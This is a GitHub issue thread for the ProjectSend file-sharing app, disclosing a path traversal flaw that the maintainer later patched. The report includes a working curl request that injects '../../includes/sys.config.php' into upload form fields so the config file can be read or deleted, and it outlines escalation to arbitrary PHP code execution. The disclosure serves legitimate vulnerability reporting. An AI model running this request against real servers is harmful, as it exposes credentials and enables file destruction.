New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Security Flaw - read and delete arbitrary files (accessible by www-data) and run arbitrary code #700
Comments
|
Thanks for the report. Will look into a way to fix this issue |
Thanks for the quick response - very cool product, by the way, thank you for working on it! There are a few other things you guys should also look into improving:
|
@ignacionelson here's a quick patch for this:
This should clean up any traversal directory information from the user provided file names, by extracting the basename of the file. |
|
@ignacionelson any news? |
|
Will get a patched version before the end of the week, thank you for providing the code also! |
|
A patched version would be very welcome. We have read multiple posts on security issues, and we're unsure just how safe ProjectSend is in it's current version. |
|
Patched on the latest version, r1070 which is now out. Thank you!! |
|
Great, thanks! |
|
Hi @ignacionelson , could you point out which was the fixing commit? |
Type
This is a:
[X] Bug report
Description of the problem
It is possible for users to read arbitrary files and (potentially) access the supporting database, delete arbitrary files, access user passwords, run arbitrary code.
Watch video for detailed information:
https://youtu.be/yca1BIDVH-c
List the steps to reproduce the issue
curl 'http://192.168.200.183/upload-process-form.php' -H 'Connection: keep-alive' -H 'Cache-Control: max-age=0' -H 'Origin: http://192.168.200.183' -H 'Upgrade-Insecure-Requests: 1' -H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3' -H 'Referer: http://192.168.200.183/upload-process-form.php' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.9,pt;q=0.8,ru;q=0.7,es;q=0.6,pl;q=0.5' -H 'Cookie: PHPSESSID=45h0ndm0sbak7ggcj26e2f0od0' --data 'finished_files%5B%5D=../../includes/sys.config.php&file%5B1%5D%5Boriginal%5D=../../includes/sys.config.php&file%5B1%5D%5Bfile%5D=hacked.txt&file%5B1%5D%5Bname%5D=own3d&file%5B1%5D%5Bdescription%5D=&upload_failed=&submit=' --compressed
This will create a file called "own3d" that will point to includes/sys.config.php, meaning the user can now download that file (and delete it if the file is writeable by www-data).
Then, IF the user has access to the MySQL server hosting ProjectSend, user can:
-- allowing for upload of arbitrary file extensions (e.g. php)
-- changing the client options, allowing clients to delete files
This will allow users to later delete arbitrary files (www-data has write access to) and run arbitrary php code.
Environment
The text was updated successfully, but these errors were encountered: